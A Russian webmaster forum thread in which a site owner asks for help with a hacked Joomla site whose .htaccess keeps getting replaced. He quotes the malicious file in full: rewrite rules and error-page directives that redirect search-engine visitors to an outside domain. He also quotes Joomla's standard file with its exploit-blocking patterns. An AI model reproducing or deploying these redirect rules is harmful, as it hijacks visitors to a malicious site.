X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость (

| Вход | Регистрация )

Открыть тему
Тема закрыта
> Подменяют файл .htaccess
Fireman2806
Fireman2806
Topic Starter сообщение 11.4.2012, 22:10; Ответить: Fireman2806
Сообщение #1


Здравствуйте. Постигла мой сайт беда... Какая-то редиска подменяет мне файл .htaccess, из-за чего при переходе из поисковика на мой сайт всех выбрасывает на главную страницу гугла. Если просто переходить по адресу, то всё нормально, сайт функционирует. Только на форуме в разделах типа "Новые сообщения" при нажатии на ссылки выкидывает всё на тот же гугл. Но сами топики и разделы форума работаю нормально. Сайт на Joomla 1.5.25, форум на phpbb3 (последняя версия).

Вот содержимое подкидываемого мне .htaccess:

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|ao
l|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|face
book|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma
|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|g
igablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|te
oma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspo
t|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|very
goodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|shareloo
k|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
RewriteRule ^(.*)$ http://agajaq.ru/indigo?5 [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvan
daag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico
|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|b
hanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|
hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseirelan
d|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir
|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|find
how|icq|goo|westaustraliaonline)\.(.*)
RewriteRule ^(.*)$ http://agajaq.ru/indigo?5 [R=301,L]
</IfModule>

ErrorDocument 400 http://agajaq.ru/indigo?5
ErrorDocument 401 http://agajaq.ru/indigo?5
ErrorDocument 403 http://agajaq.ru/indigo?5
ErrorDocument 404 http://agajaq.ru/indigo?5
ErrorDocument 500 http://agajaq.ru/indigo?5



Пробовал удалять, редактировать или заменять стандартным джумловским:


##
# @version $Id: htaccess.txt 10492 2008-07-02 06:38:28Z ircmaxell $
# @package Joomla
# @copyright Copyright (C) 2005 - 2008 Open Source Matters. All rights reserved.
# @license http://www.gnu.org/copyleft/gpl.html GNU/GPL
# Joomla! is Free Software
##
#####################################################
# READ THIS COMPLETELY IF YOU CHOOSE TO USE THIS FILE
#
# The line just below this section: 'Options +FollowSymLinks' may cause problems
# with some server configurations. It is required for use of mod_rewrite, but may already
# be set by your server administrator in a way that dissallows changing it in
# your .htaccess file. If using it causes your server to error out, comment it out (add # to
# beginning of line), reload your site in your browser and test your sef url's. If they work,
# it has been set by your server administrator and you do not need it set here.
#
#####################################################

## Can be commented out if causes errors, see notes above.
Options +FollowSymLinks

#
# mod_rewrite in use

RewriteEngine On

########## Begin - Rewrite rules to block out some common exploits
## If you experience problems on your site block out the operations listed below
## This attempts to block the most common type of exploit `attempts` to Joomla!
#
# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ index.php [F,L]
#
########## End - Rewrite rules to block out some common exploits

# Uncomment following line if your webserver's URL
# is not directly related to physical file paths.
# Update Your Joomla! Directory (just / for root)

# RewriteBase /
########## Begin - Joomla! core SEF Section
#
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_URI} !^/index.php
RewriteCond %{REQUEST_URI} (/|\.php|\.html|\.htm|\.feed|\.pdf|\.raw|/[^.]*)$ [NC]
RewriteRule (.*) index.php
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization},L]
#
########## End - Joomla! core SEF Section


При таких действиях проблема решается примерно на час - полтора, после чего мой .htaccess самопроизвольно сносится и ставится его зараженная версия.

Пробовал менять пароль от ФТП - безрезультатно. Пробовал ковыряться в "разрешениях" на этот файл: выставлено 444, если делать ниже - сайт не будет открываться.

Саппорт хостера толком ничего, кроме как "вас взломали", не подсказал.

Убился уже с этой проблемой, никак не могу понять, что именно гадит и как от этого избавиться. Прошу помощи форумчан.
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Fireman2806
Fireman2806
Topic Starter сообщение 13.4.2012, 21:20; Ответить: Fireman2806
Сообщение #2


Перезалил весь каталог public_html со старого бэкапа, в котором .htaccess был нормальный. Проверяю - вредоносный файл уже на месте! Как так?! Бред какой-то... Что ещё можно сделать?

Замечание модератора:
Эта тема была закрыта автоматически ввиду отсутствия активности в ней на протяжении 100+ дней.
Если Вы считаете ее актуальной и хотите оставить сообщение, то воспользуйтесь кнопкой
или обратитесь к любому из модераторов.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Как перенести правила переадресации из .htaccess в php обработчик nginx?
0 KrisGuseva 2084 28.12.2019, 7:33
автор: KrisGuseva
Открытая тема (нет новых ответов) Наладить htaccess на Wordpress
2 LebedevStr 1798 25.5.2017, 14:14
автор: LebedevStr
Открытая тема (нет новых ответов) Тема имеет прикрепленные файлыВопрос про файл .htacess...(Bitrix)
0 Исо 1609 6.8.2016, 10:34
автор: Исо
Открытая тема (нет новых ответов) Ищу Копипастера 3р файл картинка+текст+кач файла и закач ко мне на хостинг
0 dimka1109 3186 21.1.2015, 20:13
автор: dimka1109
Открытая тема (нет новых ответов) 300 символов описание. Картинка и файл.
21 Seo-optimist 7472 28.10.2014, 17:59
автор: Seo-optimist


 



RSS Текстовая версия Сейчас: 28.3.2024, 22:45
Дизайн